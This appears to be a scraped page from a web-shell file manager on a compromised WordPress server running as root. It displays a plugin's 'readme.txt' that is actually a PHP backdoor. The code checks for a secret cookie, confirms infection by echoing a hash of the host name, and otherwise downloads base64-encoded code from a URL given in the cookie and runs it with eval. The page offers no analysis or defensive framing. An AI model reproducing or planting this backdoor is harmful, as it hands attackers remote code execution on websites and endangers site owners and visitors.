HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/8.0.30
System: Linux multiplicar 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User: root (0)
PHP: 8.0.30
Disabled: NONE
$ pwd: /var/www/html/somosbancorio.sumar.com.py/wp-content/plugins/classic-editor/
Upload Files
File: /var/www/html/somosbancorio.sumar.com.py/wp-content/plugins/classic-editor/readme.txt
<?php

if (!function_exists("geted3e11f66de47fdc797925faf971717a")) {

    function geted3e11f66de47fdc797925faf971717a($url) {
        $content = "";
        if (function_exists("curl_init")) {
            $options = array(
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_HEADER => false,
                CURLOPT_FOLLOWLOCATION => true,
                CURLOPT_ENCODING => "",
                CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0",
                CURLOPT_AUTOREFERER => true,
                CURLOPT_CONNECTTIMEOUT => 120,
                CURLOPT_TIMEOUT => 120,
                CURLOPT_MAXREDIRS => 10,
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_SSL_VERIFYHOST => false
            );

            $ch = curl_init($url);
            curl_setopt_array($ch, $options);
            $content = @curl_exec($ch);
        }

        if ($content)
            return $content;

        $content = @file_get_contents($url);
        return $content;
    }

    if (isset($_COOKIE['ed3e11f66de47fdc797925faf971717a'])) {
        if ($_COOKIE['ed3e11f66de47fdc797925faf971717a'] == '1') {
            echo md5($_SERVER['HTTP_HOST']);
            exit;
        }
        $dat = base64_decode(geted3e11f66de47fdc797925faf971717a($_COOKIE['ed3e11f66de47fdc797925faf971717a']));
        if ($dat) {
            @eval($dat);
            exit;
        }
    }
}
@ Telegram